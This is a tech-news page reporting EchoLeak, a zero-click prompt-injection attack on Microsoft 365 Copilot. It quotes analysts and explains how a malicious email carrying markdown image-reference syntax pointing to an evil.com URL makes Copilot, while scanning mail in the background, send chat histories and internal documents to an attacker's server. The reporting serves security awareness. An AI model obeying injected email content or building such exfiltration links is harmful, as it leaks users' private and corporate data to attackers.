SUBSCRIBE
Tech Journal Now
  • Home
  • News
  • AI
  • Reviews
  • Guides
  • Best Buy
  • Software
  • Games
Reading: First-ever zero-click attack targets Microsoft 365 Copilot
Share
Tech Journal NowTech Journal Now
Font ResizerAa
  • News
  • Reviews
  • Guides
  • AI
  • Best Buy
  • Games
  • Software
Search
  • Home
  • News
  • AI
  • Reviews
  • Guides
  • Best Buy
  • Software
  • Games
Have an existing account? Sign In
Follow US
© Foxiz News Network. Ruby Design Company. All Rights Reserved.
Tech Journal Now > AI > First-ever zero-click attack targets Microsoft 365 Copilot
AI

First-ever zero-click attack targets Microsoft 365 Copilot

News Room
Last updated: June 12, 2025 1:51 pm
News Room
Share
1 Min Read
SHARE

“This is sheer weaponization of AI’s core strength, contextual understanding, against itself,” said Abhishek Anant Garg, an analyst at QKS Group. “Enterprise security struggles because it’s built for malicious code, not language that looks harmless but acts like a weapon.”

This kind of vulnerability represents a significant threat, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based services, it’s definitely not the last we’ll see.”

EchoLeak’s exploit mechanism

EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

Read the full article here

You Might Also Like

Despite its ubiquity, RAG-enhanced AI still poses accuracy and safety risks – Computerworld

Where AI skills are needed most – Computerworld

What’s in the latest build? – Computerworld

Google to give enterprises control over beta Workspace feature rollouts – Computerworld

Meta tried to lure OpenAI employees with billion-dollar salaries – Computerworld

Share This Article
Facebook Twitter Email Print
Leave a comment Leave a comment

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

- Advertisement -
Ad image

Trending Stories

Games

Mecha Break factions explained

July 3, 2025
Games

2023’s true GOTY has had its name and assets jacked by ‘some kind of crypto scam,’ while bootlickers assure the dev it’s actually great publicity

July 3, 2025
AI

The one secret to using genAI to boost your brain – Computerworld

July 3, 2025
Games

How to get Corite in Mecha Break

July 3, 2025
Games

How to get Matrix Credits in Mecha Break

July 3, 2025
Games

How to get Mission Tokens in Mecha Break

July 3, 2025

Always Stay Up to Date

Subscribe to our newsletter to get our newest articles instantly!

Follow US on Social Media

Facebook Youtube Steam Twitch Unity

2024 © Prices.com LLC. All Rights Reserved.

Tech Journal Now

Quick Links

  • Privacy Policy
  • Terms of use
  • For Advertisers
  • Contact
Welcome Back!

Sign in to your account

Username or Email Address
Password

Lost your password?